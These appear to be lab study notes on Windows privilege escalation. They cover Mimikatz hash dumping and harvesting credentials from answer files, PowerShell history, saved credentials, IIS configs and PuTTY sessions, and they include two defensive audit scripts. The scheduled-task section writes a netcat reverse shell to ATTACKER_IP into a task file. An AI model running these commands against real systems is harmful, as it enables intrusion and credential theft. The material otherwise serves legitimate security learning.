🪟 Windows Escalation

Windows Privilege Escalation

As with Linux, there are many ways to escalate our privileges on Windows:

  • Misconfigurations in services or scheduled tasks

  • Excessive privileges on a user account

  • Vulnerable software

  • Missing security patches

Windows Users

  • Administrators - Most privileges; can change any system configuration and access any file.

  • Standard Users - Can access some files and perform limited tasks.

  • SYSTEM / LocalSystem - Used by the OS to perform internal tasks; has full access to all files and can run with privileges higher than Administrators.

  • Local Service - Default account for services; authenticates to the network with anonymous credentials.

  • Network Service - Default account for services; authenticates to the network with the computer account's credentials.

Harvesting Passwords

Mimikatz

The go-to tool for Windows post-exploitation.

  • privilege::debug - Obtains the debug privilege, which allows access to other processes for debugging.

  • token::elevate - Escalates the current token's privileges to the maximum available.

  • lsadump::sam - Lists the password hashes of all local accounts on the machine (read from the SAM database).

Unattended Windows Installations

  • When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single OS image to be deployed to several hosts across the network. These kinds of installations are referred to as unattended installations because they don't require user interaction and run under the administrator account. The answer files are stored in the following locations:

    • C:\Unattend.xml

    • C:\Windows\Panther\Unattend.xml

    • C:\Windows\Panther\Unattend\Unattend.xml

    • C:\Windows\system32\sysprep.inf

    • C:\Windows\system32\sysprep\sysprep.xml

    As part of these files, you might encounter credentials:

    <Credentials>
        <Username>Administrator</Username>
        <Domain>thm.local</Domain>
        <Password>MyPassword123</Password>
    </Credentials>
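As an added example (not part of the original notes), the following Python script checks the answer-file locations listed above for Password elements that still carry a value, which is the leftover a defender wants to find and remove before an attacker does. The sample answer file is constructed for this example: it wraps the Credentials block shown above in the unattend XML namespace and adds an AutoLogon block whose secret Windows Setup has already cleared (Setup substitutes the string *SENSITIVE*DATA*DELETED* when it scrubs a value). The function names scan_known_locations and find_leftover_secrets are this example's own; sysprep.inf is INI-format and is not covered by the XML check.

```python
import os
import xml.etree.ElementTree as ET

# Value Windows Setup writes into an answer file when it clears a secret;
# a Password element holding this has already been scrubbed and is not a finding.
SCRUBBED = "*SENSITIVE*DATA*DELETED*"

# XML answer-file locations from the list above (sysprep.inf is INI-format
# and is not handled by this XML check).
KNOWN_LOCATIONS = (
    r"C:\Unattend.xml",
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\system32\sysprep\sysprep.xml",
)

# Constructed sample answer file (not taken from any real host). It carries the
# <Credentials> block shown above plus an AutoLogon block that Setup already scrubbed.
SAMPLE_UNATTEND = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-UnattendedJoin">
      <Identification>
        <Credentials>
          <Username>Administrator</Username>
          <Domain>thm.local</Domain>
          <Password>MyPassword123</Password>
        </Credentials>
      </Identification>
    </component>
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>*SENSITIVE*DATA*DELETED*</Value>
          <PlainText>true</PlainText>
        </Password>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def _child(element, name):
    return next((c for c in element if _local(c.tag) == name), None)


def find_leftover_secrets(xml_text):
    """Return one finding per <Password> element that still holds a value.

    Each finding carries the element path and whether the value is plaintext or
    the base64 form (PlainText=false); the secret itself is deliberately not echoed.
    """
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        if _local(el.tag) != "Password":
            continue
        value_el = _child(el, "Value")            # AutoLogon-style <Password><Value/>
        text = value_el.text if value_el is not None else el.text
        value = (text or "").strip()
        if not value or value == SCRUBBED:
            continue
        plain_el = _child(el, "PlainText")
        encoding = "plaintext"
        if plain_el is not None and (plain_el.text or "").strip().lower() == "false":
            encoding = "base64"                   # obfuscation only, still a finding
        steps, node = [], el
        while node is not None:
            steps.append(_local(node.tag))
            node = parents.get(node)
        findings.append({"path": "/".join(reversed(steps)), "encoding": encoding})
    return findings


def scan_known_locations(paths=KNOWN_LOCATIONS):
    """Check each known answer-file location that exists on this host."""
    report = {}
    for path in paths:
        if not os.path.isfile(path):
            continue
        try:
            with open(path, encoding="utf-8-sig") as fh:
                report[path] = find_leftover_secrets(fh.read())
        except ET.ParseError as exc:
            report[path] = [{"path": path, "error": str(exc)}]
    return report


if __name__ == "__main__":
    for finding in find_leftover_secrets(SAMPLE_UNATTEND):
        print("leftover secret at", finding["path"], "(" + finding["encoding"] + ")")
    for path, findings in scan_known_locations().items():
        print(path, "->", findings or "clean")
```

Run as an administrator on a freshly deployed host; any finding means the answer file should be deleted or its Password elements cleared, since a standard user can usually read these locations.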

PowerShell History

  • PowerShell keeps a history of previously run commands.

  • Useful for repeating commands.

  • If a user has run a command that included a password, it can be recovered from the history file:

    type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

  • PowerShell won't expand %userprofile% as an environment variable. To read the file from PowerShell, replace %userprofile% with $Env:userprofile.

Saved Windows Credentials

  • The command below will list saved credentials:

    cmdkey /list

  • While you can't see the actual passwords, you can use them with the runas command and the /savecred option, as seen below.

    runas /savecred /user:admin cmd.exe

IIS Configuration

  • Internet Information Services (IIS) is the default web server on Windows installations.

  • Its configuration is stored in web.config files, which may contain passwords for databases or for configured authentication mechanisms:

    • C:\inetpub\wwwroot\web.config

    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

  • A quick way to find database connection strings in the file:

    type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY

  • SSH clients such as PuTTY are commonly found on Windows systems.

  • PuTTY keeps its saved sessions in the registry, including any proxy credentials configured for them; they can be retrieved with this command:

    reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks ‴️⛔️

  • Scheduled tasks can be listed with the schtasks command.

  • Detailed information about one task can be shown with: schtasks /query /tn vulntask /fo list /v

  • Look for the "Task To Run" and "Run As User" fields: the first is the executable the task launches, the second is the account it runs as.

  • If our user can modify the "Task To Run" executable, then we control what is executed.

  • We can check file permissions with: icacls c:\tasks\schtask.bat

    c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                         BUILTIN\Administrators:(I)(F)
                         BUILTIN\Users:(I)(F)

  • In this case we can see BUILTIN\Users has full access (F).

  • We can modify the .bat file:

    C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

  • Then start a listener on our machine: nc -lvp 4444

  • And then we wait for the task to run
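As an added example (not part of the original notes), here is a Python audit script that parses icacls output for task executables and reports every one that a non-administrator principal can modify, which is exactly the condition checked by hand above. The icacls listing is constructed for this example, modelled on the one shown above; the LOW_PRIV set, the WRITE_* rights tables and the handling of (DENY) entries are this example's own assumptions. One limitation of icacls's text output is that a path containing spaces cannot be split unambiguously from a principal such as NT AUTHORITY\SYSTEM, so run the check from a directory without spaces or per file.

```python
import re
from dataclasses import dataclass

# Constructed sample: the output of `icacls` over a tasks directory, modelled on
# the listing shown above. Only schtask.bat and cleanup.cmd are misconfigured.
SAMPLE_ICACLS = r"""
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)
c:\tasks\backup.bat NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(RX)
c:\tasks\cleanup.cmd NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     Everyone:(I)(RX,W)
c:\tasks\locked.cmd BUILTIN\Administrators:(F)
                    Everyone:(DENY)(W)
                    Everyone:(RX)
Successfully processed 4 files; Failed processing 0 files
"""

# One ACE per line: "[path ]principal:(token)(token)...". Principals may contain
# spaces (NT AUTHORITY\SYSTEM), so the split is taken at the first whitespace
# that is followed by a colon-free name and a run of parenthesised tokens.
ACE_RE = re.compile(r"(?:^|\s)([^:\s][^:]*):((?:\([^)]*\))+)\s*$")

INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple rights that allow changing the file: full control, modify, write.
WRITE_SIMPLE = {"F", "M", "W"}
# Specific rights that allow changing content, the ACL, or the owner.
WRITE_SPECIFIC = {"WD", "AD", "WDAC", "WO"}
# Principals every standard user holds (assumption of this example): a write
# grant to any of them means a non-administrator can replace the task body.
LOW_PRIV = {"everyone", "builtin\\users",
            "nt authority\\authenticated users", "nt authority\\interactive"}


@dataclass
class Finding:
    path: str
    principal: str
    rights: str


def parse_icacls(text):
    """Yield (path, principal, tokens) for every ACE line in icacls output."""
    path = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = ACE_RE.search(raw)
        if m is None:
            continue                      # summary line, not an ACE
        if not raw[0].isspace():          # first line of a file block carries the path
            path = raw[: m.start()].strip()
        tokens = re.findall(r"\(([^)]*)\)", m.group(2))
        yield path, m.group(1).strip(), tokens


def grants_write(tokens):
    """True if the ACE tokens allow the file to be modified."""
    if "DENY" in tokens:
        return False
    for tok in tokens:
        if tok in INHERIT_FLAGS:
            continue
        if any(r.strip() in WRITE_SIMPLE or r.strip() in WRITE_SPECIFIC
               for r in tok.split(",")):
            return True
    return False


def audit_icacls(text):
    """Return a Finding for every low-privileged principal that can modify a file."""
    return [Finding(path, principal, "".join(f"({t})" for t in tokens))
            for path, principal, tokens in parse_icacls(text)
            if principal.lower() in LOW_PRIV and grants_write(tokens)]


if __name__ == "__main__":
    for f in audit_icacls(SAMPLE_ICACLS):
        print(f"{f.path}: {f.principal} can modify it {f.rights}")
```

On a real host, save the output of icacls over the directory holding the task executables (for example icacls c:\tasks\* > acl.txt) and pass the file's contents to audit_icacls; every finding is a task whose "Task To Run" should be moved to an administrator-only location or have the offending ACE removed, since anything that task runs as SYSTEM is then controlled by whoever can write the file.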

Automated Enumeration ‴️⛔

  • WinPEAS
